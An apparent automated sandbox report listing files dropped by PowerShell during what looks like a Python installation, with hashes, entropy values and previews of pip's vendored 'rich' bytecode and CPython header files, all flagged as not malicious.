                                                                                                    Preview:........=.Cf...............................U.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+m,Z,..d.d.l-m.Z...e.j^..................d.k\..r.d.d.l.m0Z0m1Z1m2Z2..n.d.d.l3m0Z0m1Z1m2Z2..d.d.l4m5Z5m6Z6..d.d.l7m7Z7..d.d.l8m9Z9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>m?Z?..d.d.l@mAZAmBZB..d.d.lCmDZDmEZE..d.d.lFmGZG..d.d.lHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZO..d.d.lPmQZQmRZR..d.d.lSmTZTmUZU..d.d.lVmWZWmXZX..d.d lYmZZZ..d.d!l[m\Z\..d.d"l]m^Z^..d.d#l_m`Z`..d.d$lambZb..d.d%lcmdZdmeZe..d.d&lfmgZg..d.d'lhmiZimjZjmkZk..d.d(llmmZmmnZn..d.d)lompZpmqZq..e.r.d.d*lrmsZs..d.d+ltmuZu..d.d,lvmwZw..d-Zxd.Zy..e.j...........................d/k(..Z{e!e+e|d0f.....g.d0f.....Z}e0d1....Z~e0d2....Z...G.d3..d4........Z...e.........Z...e...j.....................j...........................Z...e...j.....................j.......
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2269
                                                                                                    Entropy (8bit):5.247157313118127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:b1IVeFRfbTfE4umBoiWR1cv03rFZ+/lTnyk7HUB:biUR/E4bBWI8RZ+/lTyOW
                                                                                                    MD5:84009785D3D3D199843ED4C87A4C1672
                                                                                                    SHA1:6EE1B176792525C178F011852AD375AD10B1E76B
                                                                                                    SHA-256:4829401DAC3941BD45F790C25874931059F3C5CC1635FA54864A322532A6F648
                                                                                                    SHA-512:2B38337EFD584C02C0FB05791CFFB9CADDB8BE4C967E012EF2B270BBD924623E5A82825F4ACA1AD7EE31566B022440B62D67E7A30873B895EE50D6F310BCD9BF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf..........................^.....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z.m.Z.m.Z.....G.d...d.e.........Z.y.)......)...Optional..TYPE_CHECKING.....)...JupyterMixin)...Measurement)...Console..ConsoleOptions..RenderableType..RenderResultc.....................T.....e.Z.d.Z.d.Z.d.d.d.d.e.e.....d.d.f.d...Z.............d.d...Z.............d.d...Z.y.)...Constrainz.Constrain the width of a renderable to a given number of characters... Args:. renderable (RenderableType): A renderable object.. width (int, optional): The maximum width (in characters) to render. Defaults to 80.. ..renderabler......width..returnNc..................... .....|.|._.........|.|._.........y...N).r....r....)...selfr....r....s.... .fC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/constrain.py..__init__z.Constrain.__init__....s........$................c................#........K.....|.j.....................|.j.......................
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9237
                                                                                                    Entropy (8bit):5.249964851993909
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:p4NrHlk/sctcqOcWciYjIYLUxorAD76SkPSpua/voBJEKe:peH2WgZ3Ubo8uLSpO8Ke
                                                                                                    MD5:B99A188F7A70FAFF9D9BECAEFDB26129
                                                                                                    SHA1:4219B14126E8F701A354B9B4F9485C3C687E33F4
                                                                                                    SHA-256:1F2A671CB4ABC5DA05CEDACEBA0344990F3373708FB81DC53F20E468B68EC291
                                                                                                    SHA-512:09CE643BEE71C6683DA31D20388FB963BE7D906773E01EB929C9F93581C78D874F4A270FA61A1F8DD49C3107D375881899931BC749F0D007980FCB389BEECCB3
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cfy..............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.d.........Z...G.d...d.........Z...G.d...d.........Z.y.)......)...zip_longest)...Iterator..Iterable..List..Optional..Union..overload..TypeVar..TYPE_CHECKING.....)...Console..ConsoleOptions..JustifyMethod..OverflowMethod..RenderResult..RenderableType....Text)...cell_len)...Measurement..Tc.....................r.....e.Z.d.Z.d.Z...d.d.e.e.d.........d.d.f.d...Z.............d.d...Z.............d.d...Z.d.d...Z.d.e.d.....f.d...Z.y.)...Renderablesz:A list subclass which renders its contents to the console.N..renderablesr......returnc.....................8.....|...t.........|.........|._.........y.g.|._.........y...N)...list.._renderables)...selfr....s.... .gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/rich/containers.py..__init__z.Renderables.__init__!...s$........"-.!8.D..............>
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10940
                                                                                                    Entropy (8bit):5.3094161703374185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:9wdymSwBEDc/O9EEOHYt2DNhCi32Wc/1pBXbX5crRPwg2li40jNMuXvNWbqeHRHv:SdyeEE9DNAyNc/96d2PazeVQNW
                                                                                                    MD5:B1670B6BF8E5775456B4147DE73CA5B8
                                                                                                    SHA1:84181E7538F94C3EEDB627C388F7685AC2059FE2
                                                                                                    SHA-256:626928A16B5EB6497BE1D232F6396A757522402C9E9FE00B01DA21E3121CB98B
                                                                                                    SHA-512:7576E16F438AB633AD488134396F2FC7B65FD6EE7D4F081EDB8B6757038ADADF2D3D3598AC88807FF3F5BE11A56147F7D05EEC5BE87D83254BACEECA6D7F0CBF
                                                                                                    Malicious:false
                                                                                                    Preview:........=.Cf................................U.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.j...................d.k\..r.d.d.l.m.Z...n.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...e.r.d.d.l.m.Z.m.Z.m.Z...g.d...Z.e.e.d.<...e.D...c.i.c.]...}.|.d.......c.}.Z.e.e.d.<...d.d.d.d.d.d...Z.e.e.d.<...i.e.j0..................d.....e.j2..................d.....e.j4..................d.....e.j6..................d.....e.j8..................d.....e.j:..................d.....e.j<..................d.....e.j>..................d.....e.j@..................d.....e.jB..................d.....e.jD..................d.....e.jF..................d.....e.jH..................d.....e.jJ..................d.....e.jL..................d.....e.jN..................d ....Z(e.e)e.d!e*f.....f.....e.d"<.....G.d#..d$........Z+e.f.d%e*d&e.e)d.f.....d'e*f.d(..Z,e.f.d%e*d&e.e)e*f.....d'e*f.d)..Z-e.d*k(..rUd.d+l/m.Z.....e.........Z.e.ja..................d,............e1d-........D.]+..Z2e.jg..................d.d/e2z...z...............e.jh....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33515
                                                                                                    Entropy (8bit):5.049225836907265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ARfw2fvQG1vQ+tHc76EETHXe3/IUOLZt5FooP2LG+nx4E3WNVUr9zzXmMRn:4fwBg9t5bRE4E36VSPXmyn
                                                                                                    MD5:E450B9493F54CA366A4CC705A521F6A8
                                                                                                    SHA1:913079D9E413D335B97375475FD4E121262D4F9D
                                                                                                    SHA-256:45FA29126FA9B3C887505D1165A8F2A0A3E1B94189574F6279D49E4EDC940A57
                                                                                                    SHA-512:32C351794B775D9BF18ED5D413729628660FA082FEDBFAB94B364DEC50C697D8815D88A9B24D968F4F41EAEE581511B79F386BC51A4EE66877C39D61BFD032E0
                                                                                                    Malicious:false
                                                                                                    Preview:/* Abstract Object Interface (many thanks to Jim Fulton) */....#ifndef Py_ABSTRACTOBJECT_H..#define Py_ABSTRACTOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* === Object Protocol ================================================== */..../* Implemented elsewhere:.... int PyObject_Print(PyObject *o, FILE *fp, int flags);.... Print an object 'o' on file 'fp'. Returns -1 on error. The flags argument.. is used to enable certain printing options. The only option currently.. supported is Py_PRINT_RAW. By default (flags=0), PyObject_Print() formats.. the object by calling PyObject_Repr(). If flags equals to Py_PRINT_RAW, it.. formats the object by calling PyObject_Str(). */....../* Implemented elsewhere:.... int PyObject_HasAttrString(PyObject *o, const char *attr_name);.... Returns 1 if object 'o' has the attribute attr_name, and 0 otherwise..... This is equivalent to the Python expression: hasattr(o,attr_name)..... This function always succeeds. */....../* Implem
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):278
                                                                                                    Entropy (8bit):5.092780173257203
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:BMraEAQ0d9a7jQ6z3yXVBIAMz5jQ6dnra2zv:BNFcVNdD
                                                                                                    MD5:BE92944A8F488C10556BCA4885E85A09
                                                                                                    SHA1:4E8FB17BCE9D0084F330B4675A5A8FBDD1859979
                                                                                                    SHA-256:9BC7D4F6546AD38715880208EBE004616CCB76413009B664BD8FE1D3EBA06F59
                                                                                                    SHA-512:350DD34CA060175C11E34AC5854E118E84F520DF5F1237CCCD3BA76D5192479BEA81643D48BE5E7D76E04649F781F5D5A6ABDC76C2538602FEF8C4DD1D854C27
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_BLTINMODULE_H..#define Py_BLTINMODULE_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyFilter_Type;..PyAPI_DATA(PyTypeObject) PyMap_Type;..PyAPI_DATA(PyTypeObject) PyZip_Type;....#ifdef __cplusplus..}..#endif..#endif /* !Py_BLTINMODULE_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1178
                                                                                                    Entropy (8bit):5.203769393844747
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:UIBamrLuzcAA0m1+RgIaLPermmroiXCEbdUJlHt1oXCmlMga1o1f9paqI1frWCnR:Xas17z9itdUJhrm6g+JhfM4q+
                                                                                                    MD5:EAD740053C2F5CC4F5749EECC38B10A7
                                                                                                    SHA1:7465C882C5377662BD47D151ACB3B1A2EF2EFEEC
                                                                                                    SHA-256:F64D91178208312D80D5D46BE9426FF23C951B91A5315C888AC76AAB2D700C17
                                                                                                    SHA-512:5809C3AB4DD3B208B99EAC407D258B646FD632B21A6CFC2599B61147C2BB24D95F50BAC702362523CD7B8E0075C31C1497195BE6445AB83032CBA9F3E8FA8D56
                                                                                                    Malicious:false
                                                                                                    Preview:/* Boolean object interface */....#ifndef Py_BOOLOBJECT_H..#define Py_BOOLOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif......// PyBool_Type is declared by object.h....#define PyBool_Check(x) Py_IS_TYPE((x), &PyBool_Type)..../* Py_False and Py_True are the only two bools in existence. */..../* Don't use these directly */..PyAPI_DATA(PyLongObject) _Py_FalseStruct;..PyAPI_DATA(PyLongObject) _Py_TrueStruct;..../* Use these macros */..#define Py_False _PyObject_CAST(&_Py_FalseStruct)..#define Py_True _PyObject_CAST(&_Py_TrueStruct)....// Test if an object is the True singleton, the same as "x is True" in Python...PyAPI_FUNC(int) Py_IsTrue(PyObject *x);..#define Py_IsTrue(x) Py_Is((x), Py_True)....// Test if an object is the False singleton, the same as "x is False" in Python...PyAPI_FUNC(int) Py_IsFalse(PyObject *x);..#define Py_IsFalse(x) Py_Is((x), Py_False)..../* Macros for returning Py_True or Py_False, respectively */..#define Py_RETURN_TRUE return Py_True..#define Py_RETURN_FALSE
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1510
                                                                                                    Entropy (8bit):5.215885421487236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:fNBpgWrWdNhGUdGUd4wZDnXnQMjrDQGkzuGHKljNiEZbs:FbgWyGOLnXnQ4rDQGSFKljNNA
                                                                                                    MD5:AB8E1A6710F2700EDAF3B5AF1810584E
                                                                                                    SHA1:D733222C870B4AB1A05189EB4B72C61C0F3C234B
                                                                                                    SHA-256:CEBCD3142F4A89F5D8E16A91A353B4B0FA1EFD156C41F0F7667B08502348DBC4
                                                                                                    SHA-512:7208A322D0C414FFC32B322859D1E7E0FD092262A7FD9239F532CA46F1C02AB7BDBF00A213AE8E18E01D3443F701159DFB488EFDE39083EB3F7F6D5205F05F9D
                                                                                                    Malicious:false
                                                                                                    Preview:/* ByteArray object interface */....#ifndef Py_BYTEARRAYOBJECT_H..#define Py_BYTEARRAYOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Type PyByteArrayObject represents a mutable array of bytes... * The Python API is that of a sequence;.. * the bytes are mapped to ints in [0, 256)... * Bytes are not characters; they may be used to encode characters... * The only way to go between bytes and str/unicode is via encoding.. * and decoding... * For the convenience of C programmers, the bytes type is considered.. * to contain a char pointer, not an unsigned char pointer... */..../* Type object */..PyAPI_DATA(PyTypeObject) PyByteArray_Type;..PyAPI_DATA(PyTypeObject) PyByteArrayIter_Type;..../* Type check macros */..#define PyByteArray_Check(self) PyObject_TypeCheck((self), &PyByteArray_Type)..#define PyByteArray_CheckExact(self) Py_IS_TYPE((self), &PyByteArray_Type)..../* Direct API functions */..PyAPI_FUNC(PyObject *) PyByteArray_FromObject(PyObject *);..PyAPI_FUNC(PyObject *) PyByteA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2688
                                                                                                    Entropy (8bit):5.03241958564926
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Kp0LK3hWrc7yOD31cHi4AYcalONk3GRdk/MWkGLvWNHYN5Ucf0ID+Gw+AIKHzTLU:KzQ2Z3C6skN3GLcYN5qq5XKLKydpo
                                                                                                    MD5:A507BB1598708E79F7A0B998863BEB0A
                                                                                                    SHA1:0DCAD55B80510BA7DCBA82FACF375B88BFF37E21
                                                                                                    SHA-256:F940E738ABCD25E611F2E37321AE34FF15726F97AF3525E87847A56B8910B4F0
                                                                                                    SHA-512:30654E006589E747FCCD14823671C04C0BE83BF4395CABEBFF3ED306C1C9262D846B631CE71D1B8B1C91756730B891FC409E1A73D20D43C85C60D1E7FDBF95D7
                                                                                                    Malicious:false
                                                                                                    Preview:../* Bytes object interface */....#ifndef Py_BYTESOBJECT_H..#define Py_BYTESOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....#include <stdarg.h> // va_list..../*..Type PyBytesObject represents a byte string. An extra zero byte is..reserved at the end to ensure it is zero-terminated, but a size is..present so strings with null bytes in them can be represented. This..is an immutable object type.....There are functions to create new bytes objects, to test..an object for bytes-ness, and to get the..byte string value. The latter function returns a null pointer..if the object is not of the proper type...There is a variant that takes an explicit size as well as a..variant that assumes a zero-terminated string. Note that none of the..functions should be applied to NULL pointer...*/....PyAPI_DATA(PyTypeObject) PyBytes_Type;..PyAPI_DATA(PyTypeObject) PyBytesIter_Type;....#define PyBytes_Check(op) \.. PyType_FastSubclass(Py_TYPE(op), Py_TPFLAGS_BYTES_SUBCLAS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6435
                                                                                                    Entropy (8bit):5.16815735809761
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:bE4Ve4NUnqRZDEEfXncu3ypBMxreupqH0AcczYn4xjZ9nKaT6azEjZegaiRW:bEMJ9oeXt0B2r/4TE+rpgaiRW
                                                                                                    MD5:F3ABA8D81740F657C3FA2B2CBBBA89DB
                                                                                                    SHA1:C8406E48FFFE4A94CCF4CBAA71F40E46F1BF32B4
                                                                                                    SHA-256:74D3F6D9DDA30EBE2D4679E60D2EF39822F692F202E5062F2EF08634FD5F8155
                                                                                                    SHA-512:2DE84F4657C8F52AD8D1D5868A2D47B06065D3504D5F682E17656845E29845F338BAC7EDBA6C4914ABFD80E3E4F451DD8CDB73BF33BF66F8178217818D48DC6E
                                                                                                    Malicious:false
                                                                                                    Preview:/* Interface to random parts in ceval.c */....#ifndef Py_CEVAL_H..#define Py_CEVAL_H..#ifdef __cplusplus..extern "C" {..#endif......PyAPI_FUNC(PyObject *) PyEval_EvalCode(PyObject *, PyObject *, PyObject *);....PyAPI_FUNC(PyObject *) PyEval_EvalCodeEx(PyObject *co,.. PyObject *globals,.. PyObject *locals,.. PyObject *const *args, int argc,.. PyObject *const *kwds, int kwdc,.. PyObject *const *defs, int defc,.. PyObject *kwdefs, PyObject *closure);..../* PyEval_CallObjectWithKeywords(), PyEval_CallObject(), PyEval_CallFunction.. * and PyEval_CallMethod are deprecated. Since they are officially part of the.. * stable ABI (PEP 384), they must be kept for backward compatibility... * PyObject_Call(), PyObject_CallFunction() and PyObject_CallMethod() are..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7319
                                                                                                    Entropy (8bit):4.906117974667103
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:neJjxcT8JKIXaHFD4DHD4KTXGn7b7WoPBaMxmShlAT:TpIKlD4DRTW7b7RPBaMLheT
                                                                                                    MD5:36B63F92D98A926090A007E1FE6252D4
                                                                                                    SHA1:73E0B3D0858EA58257EE2FC8B193DB69FA2D4A70
                                                                                                    SHA-256:5EFDBAE68E530CCD2BD918C1B0DE68570397ECE9C5ACD453058E2DCAA35126DB
                                                                                                    SHA-512:3D2A3FA7CBE8D6093A12BF2C38BA5C83EAC33879AE8BFC186EF8603D9433CA1F04D465D306D894E9EA01B8777FB300208103B306757BD45EC0E41C5CFB743053
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CODECREGISTRY_H..#define Py_CODECREGISTRY_H..#ifdef __cplusplus..extern "C" {..#endif..../* ------------------------------------------------------------------------.... Python Codec Registry and support functions......Written by Marc-Andre Lemburg (mal@lemburg.com).....Copyright (c) Corporation for National Research Initiatives..... ------------------------------------------------------------------------ */..../* Register a new codec search function..... As side effect, this tries to load the encodings package, if not.. yet done, to make sure that it is always first in the list of.. search functions..... The search_function's refcount is incremented by this function. */....PyAPI_FUNC(int) PyCodec_Register(.. PyObject *search_function.. );..../* Unregister a codec search function and clear the registry's cache... If the search function is not registered, do nothing... Return 0 on success. Raise an exception and return -1 on error. */....PyAPI_FUNC(
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):470
                                                                                                    Entropy (8bit):5.012445431773599
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Bl1Im21IkvEyLMvE36WkQZhLtrCJ7TplcQ/BgpjOInD:Tem2ewTLMvGXIpp/mpj1nD
                                                                                                    MD5:FD0518C3781EFC55ECC8A8706BCEDA17
                                                                                                    SHA1:84443863E3CAE1C52CCBB754ABCDF7543B08477C
                                                                                                    SHA-256:233E46ABC04B0CEF0169F0108695287DCDE0C31468E734D4AFA8D2C228CAD76A
                                                                                                    SHA-512:CD8072892431DA08165D42E5E4FC283D48947BBCAE9E4E535107FDCA565AEBA91DD66C8F6045660A3487C17C72F1D15B6BF78255216A6BB5370A39C4FD67B73D
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_COMPILE_H..#define Py_COMPILE_H..#ifdef __cplusplus..extern "C" {..#endif..../* These definitions must match corresponding definitions in graminit.h. */..#define Py_single_input 256..#define Py_file_input 257..#define Py_eval_input 258..#define Py_func_type_input 345....#ifndef Py_LIMITED_API..# define Py_CPYTHON_COMPILE_H..# include "cpython/compile.h"..# undef Py_CPYTHON_COMPILE_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_COMPILE_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758
                                                                                                    Entropy (8bit):5.339781679537925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:U/HKrl1X21h3ShQNjXN89Nj3IYTunO5OPMLyOPziSrCJ7pcM3B+O+:FZ2DEQNS9NDr/QPMLvPziNPEf
                                                                                                    MD5:4505CF9A1806E32E10E90F138E88194A
                                                                                                    SHA1:A0125472F95F108F2B97F40CD65D6BA3ED26326B
                                                                                                    SHA-256:2C3DB293A8B3921B7C9C2ADEE62B0CC0FFED5D7D1D388084605B76970D029A5B
                                                                                                    SHA-512:F056B5841530D52F8329D895F05EDBD624B9D21C4971FF22771CC997EDAC4F139225350FBB4C3CFF1C3FD33835AF8E6DF2BB4F1CCCFE2D881DB63EE4A7968FD4
                                                                                                    Malicious:false
                                                                                                    Preview:/* Complex number structure */....#ifndef Py_COMPLEXOBJECT_H..#define Py_COMPLEXOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* Complex object interface */....PyAPI_DATA(PyTypeObject) PyComplex_Type;....#define PyComplex_Check(op) PyObject_TypeCheck((op), &PyComplex_Type)..#define PyComplex_CheckExact(op) Py_IS_TYPE((op), &PyComplex_Type)....PyAPI_FUNC(PyObject *) PyComplex_FromDoubles(double real, double imag);....PyAPI_FUNC(double) PyComplex_RealAsDouble(PyObject *op);..PyAPI_FUNC(double) PyComplex_ImagAsDouble(PyObject *op);....#ifndef Py_LIMITED_API..# define Py_CPYTHON_COMPLEXOBJECT_H..# include "cpython/complexobject.h"..# undef Py_CPYTHON_COMPLEXOBJECT_H..#endif....#ifdef __cplusplus..}..#endif..#endif /* !Py_COMPLEXOBJECT_H */..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8076
                                                                                                    Entropy (8bit):5.0967663605391715
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:siFi79pbVj+xOFdLQ1PZKR1RZVxA/t+Eb:pY7D4YQ1hwbZfCt+Eb
                                                                                                    MD5:884D92AF8ED9A6DCF989FB38D5D49C9D
                                                                                                    SHA1:AF33F3E73502046ACF5091B99C8AB0C16A327FC7
                                                                                                    SHA-256:FC038177A6EB3AB4B4131DAD020E3B805E95FB337D25C1DA37D7B4B5D921FC19
                                                                                                    SHA-512:E0440A9D0EB324A2689D5F5FF6FBC2D702011DF74E48D021FB7DE324011D4FE15B7BED612E4E2A6165FEE904A5882A311E7A43B211F5D279F0BFAA0AAE6D63C7
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_ABSTRACTOBJECT_H..# error "this header file must not be included directly"..#endif..../* === Object Protocol ================================================== */....#ifdef PY_SSIZE_T_CLEAN..# define _PyObject_CallMethodId _PyObject_CallMethodId_SizeT..#endif..../* Convert keyword arguments from the FASTCALL (stack: C array, kwnames: tuple).. format to a Python dictionary ("kwargs" dict)..... The type of kwnames keys is not checked. The final function getting.. arguments is responsible to check if all keys are strings, for example using.. PyArg_ParseTupleAndKeywords() or PyArg_ValidateKeywordArguments()..... Duplicate keys are merged using the last value. If duplicate keys must raise.. an exception, the caller is responsible to implement an explicit keys on.. kwnames. */..PyAPI_FUNC(PyObject *) _PyStack_AsDict(.. PyObject *const *values,.. PyObject *kwnames);..../* Suggested size (number of positional arguments) for arrays of PyObject*.. alloc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1197
                                                                                                    Entropy (8bit):5.082527943546492
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ewxibUnxR7xyBEyCt3biSRa5sfToqr5om3Rk1Kr5oJZLrN5:ecgWR7dLihufToEmm3RkSmJZL3
                                                                                                    MD5:42F5173439E434D0249691ADE0A33DE7
                                                                                                    SHA1:46F2FC282091254299AB9D187819C20D085DCBEF
                                                                                                    SHA-256:30A61FF55514C0B0955A0954CD130FE6878C64D79C1A3034C0F54A5D3CAD2E52
                                                                                                    SHA-512:C78B05583D8F4384E51F046EE256FDAB3A03A756FAABB5C48A999145A9273AD97485ACA488BA3FBE372EB68C14B4529BC103D29BA67B0BE0631BDEE44DE2557E
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_BYTEARRAYOBJECT_H..# error "this header file must not be included directly"..#endif..../* Object layout */..typedef struct {.. PyObject_VAR_HEAD.. Py_ssize_t ob_alloc; /* How many bytes allocated in ob_bytes */.. char *ob_bytes; /* Physical backing buffer */.. char *ob_start; /* Logical start inside ob_bytes */.. Py_ssize_t ob_exports; /* How many buffer exports */..} PyByteArrayObject;....PyAPI_DATA(char) _PyByteArray_empty_string[];..../* Macros and static inline functions, trading safety for speed */..#define _PyByteArray_CAST(op) \.. (assert(PyByteArray_Check(op)), _Py_CAST(PyByteArrayObject*, op))....static inline char* PyByteArray_AS_STRING(PyObject *op)..{.. PyByteArrayObject *self = _PyByteArray_CAST(op);.. if (Py_SIZE(self)) {.. return self->ob_start;.. }.. return _PyByteArray_empty_string;..}..#define PyByteArray_AS_STRING(self) PyByteArray_AS_STRING(_PyObject_CAST(self))....static inline Py_ssize_t PyBy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4555
                                                                                                    Entropy (8bit):4.959829710548539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ecS2m2ThQLRZ7JZDpffTGf9bTPD+yWsW044sAWs84KZ4Ko44o44KLB:xDmxLR7ZDp3TgiyWsW0JzWs8pZpofo4T
                                                                                                    MD5:F29B6D38047474B0A7B2269C9955C3ED
                                                                                                    SHA1:22549C9E01F0EFEF67AE8BA709D86C6877C4A480
                                                                                                    SHA-256:38DD20136824048FDED9C197C1A7D07FF5AADA86700D21E0599994B38BF00B8A
                                                                                                    SHA-512:DE8966584A9DCB92C00677CD2C541B1907F2811D71707D7E6D06F67BA5FF84031A6BE619B220B663AE12BA883AA84D3DD29BD8E5163DA88F588A464FEAC153BA
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_BYTESOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_VAR_HEAD.. Py_DEPRECATED(3.11) Py_hash_t ob_shash;.. char ob_sval[1];.... /* Invariants:.. * ob_sval contains space for 'ob_size+1' elements... * ob_sval[ob_size] == 0... * ob_shash is the hash of the byte string or -1 if not computed yet... */..} PyBytesObject;....PyAPI_FUNC(int) _PyBytes_Resize(PyObject **, Py_ssize_t);..PyAPI_FUNC(PyObject*) _PyBytes_FormatEx(.. const char *format,.. Py_ssize_t format_len,.. PyObject *args,.. int use_bytearray);..PyAPI_FUNC(PyObject*) _PyBytes_FromHex(.. PyObject *string,.. int use_bytearray);..../* Helper for PyBytes_DecodeEscape that detects invalid escape chars. */..PyAPI_FUNC(PyObject *) _PyBytes_DecodeEscape(const char *, Py_ssize_t,.. const char *, const char **);..../* Macros and static inline functions, trading s
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1120
                                                                                                    Entropy (8bit):5.1296969351387744
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:U5mrCJBrhNz+X5oxme7hsV4afIIYo5ntnIoD39oA1S3gOht/Dx5V32b1gVHgOJqP:iZPnxzsJfIwp/mthh4b1EtJqMx254a/
                                                                                                    MD5:69BEE18A8C48C021A7EA6C23DF3D9772
                                                                                                    SHA1:BF1A0DC07C757B3FAF28A96B7AA9B1CA812173DB
                                                                                                    SHA-256:41B60E8DA674956162F886D3B6A005CC16F1551171AE8329CBD8FCAEE08C1F52
                                                                                                    SHA-512:2870A2C86F9F83DF1CB906C0B6D68BF68FC26EF24DCE01DA99A10FEB5745A12AB63B263C6EB6E0491A87625474D615EEA8DCDD20C9C048E21EC68B1B3D118597
                                                                                                    Malicious:false
